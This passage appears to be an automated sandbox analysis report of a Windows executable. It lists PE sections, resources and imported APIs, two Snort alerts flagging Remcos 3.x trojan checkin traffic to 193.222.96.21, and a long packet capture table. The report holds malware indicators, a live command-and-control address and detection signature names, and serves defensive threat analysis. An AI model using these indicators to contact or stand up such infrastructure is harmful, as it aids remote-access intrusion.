.rdata	0x8000	0x1358	0x1400	bd82d08a08da8783923a22b467699302	False	0.4431640625	data	5.103358601944578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb78	0x600	caa377d001cfc3215a3edff6d7702132	False	0.5091145833333334	data	4.126209888385862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x24000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4e000	0x21fc0	0x22000	b6895077917494c69888f8ec28defac3	False	0.5621625114889706	data	5.704065075881836	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4e448	0xc828	Device independent bitmap graphic, 128 x 256 x 24, image size 51200	English	United States	0.1488095238095238
RT_ICON	0x5ac70	0x874c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9902413673634369
RT_ICON	0x633c0	0x3fd8	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9864170337738619
RT_ICON	0x67398	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.35
RT_ICON	0x69940	0x202c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.986401165614376
RT_ICON	0x6b970	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.41580675422138835
RT_ICON	0x6ca18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.4600213219616205
RT_ICON	0x6d8c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.5879963898916968
RT_ICON	0x6e168	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.3871951219512195
RT_ICON	0x6e7d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4190751445086705
RT_ICON	0x6ed38	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6019503546099291
RT_ICON	0x6f1a0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.5403225806451613
RT_ICON	0x6f488	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.6756756756756757
RT_DIALOG	0x6f5b0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6f6b0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6f7d0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6f898	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6f8f8	0xbc	data	English	United States	0.6382978723404256
RT_VERSION	0x6f9b8	0x2c4	data	English	United States	0.4901129943502825
RT_MANIFEST	0x6fc80	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/02/24-19:02:32.592137	TCP	2032777	ET TROJAN Remcos 3.x Unencrypted Server Response	29871	49740	193.222.96.21	192.168.2.4
05/02/24-19:02:02.070800	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49740	29871	192.168.2.4	193.222.96.21

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 19:01:50.933631897 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:50.933681965 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:50.934083939 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:50.976639986 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:50.976661921 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.166347980 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.166435957 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.216320992 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.216341019 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.216669083 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.216793060 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.220940113 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.268119097 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388468027 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388510942 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388535023 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.388549089 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388587952 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388607025 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.388612032 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388633966 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.388643980 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388674021 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.388675928 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388684988 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.388752937 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.388752937 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.388984919 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389055014 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389060020 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389111042 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389116049 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389173031 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389200926 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389206886 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389219046 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389242887 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389259100 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389324903 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389822960 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389877081 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389900923 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389906883 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389924049 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389982939 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.389992952 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.389997005 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.390146971 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.390151978 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.390331030 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.390877008 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.390922070 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.390925884 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.390952110 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.390985012 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391010046 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.391015053 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391040087 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391062975 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.391067982 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391182899 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.391668081 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391726971 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391756058 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391829967 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.391835928 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.391988993 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.392164946 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.392235994 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.392251968 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.392256975 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.392298937 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.392323017 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.392327070 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.392379999 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.392385960 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.392467022 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.393053055 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.393105030 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.393129110 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.393134117 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.393151999 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.393162012 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.393187046 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.393192053 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.393212080 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.393239975 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.393928051 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.394021034 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.476759911 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.476979971 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.476990938 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.477068901 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.477148056 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.477224112 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.477807045 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.477900982 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.478283882 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.478378057 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.479557037 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.479657888 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.479980946 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.480056047 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.480170965 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.480254889 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.480427980 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.480485916 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.480681896 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.480773926 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.480950117 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.481043100 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.481488943 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.481559038 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.481756926 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.481817961 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.482270002 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.482381105 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.482474089 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.482585907 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.483417988 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.483520031 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.483555079 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.483656883 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.483731031 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.483859062 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.564018965 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.564126015 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.564151049 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.564160109 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.564181089 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.564186096 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.564229965 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.564234972 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.564472914 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.565035105 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.565143108 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.565239906 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.565334082 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.565922976 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.565994978 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.566015959 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.566021919 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.566047907 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.566265106 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.566725969 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.566950083 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.567230940 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.567281008 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.567306995 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.567313910 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.567336082 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.567466974 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.567496061 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.567502022 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.567574024 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.568454981 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.568552017 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.568572044 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.568659067 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.569446087 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.569520950 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.569642067 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.569729090 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.570107937 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.570200920 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.570566893 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.570713043 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.570800066 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.571419001 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.571444035 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.571449995 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.571654081 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.571677923 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.571683884 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.572424889 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.572462082 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.572468042 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.573618889 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.573864937 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.573872089 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.573901892 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.573934078 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.573941946 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.574158907 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.574865103 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.574887991 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.575033903 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.575042009 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.575113058 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.576565027 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.576603889 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.576638937 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.576644897 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.576663017 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.576731920 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.578238964 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.578257084 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.578475952 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.578483105 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.578561068 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.580050945 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.580065966 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.580156088 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.580163002 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.580229998 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.581418991 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.581434011 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.581501961 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.581501961 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.581511974 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.581578970 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.583296061 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.583309889 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.583417892 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.583425045 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.583503962 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.584882021 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.584897041 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.585089922 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.585095882 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.585174084 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.586816072 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.586831093 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.586930037 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.586936951 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.587006092 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.652282000 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.652301073 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.652406931 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.652406931 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.652417898 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.653765917 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.653785944 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.653867006 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.653867006 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.653875113 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.653932095 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.655206919 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.655221939 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.655464888 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.655471087 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.655632973 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.656860113 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.656876087 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.656941891 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.656941891 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.656949043 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.658456087 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.658473969 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.658504963 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.658510923 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.658531904 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.659612894 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.661345005 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.661367893 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.661427975 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.661441088 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.661628962 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.663145065 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.663160086 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.663220882 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.663227081 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.663683891 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.664608002 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.664624929 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.664764881 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.664771080 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.665024996 CEST	49739	443	192.168.2.4	104.21.45.139
May 2, 2024 19:01:51.665076017 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.665143967 CEST	443	49739	104.21.45.139	192.168.2.4
May 2, 2024 19:01:51.665169954 CEST	49739	443	192.168.2.4	104.21.45.139
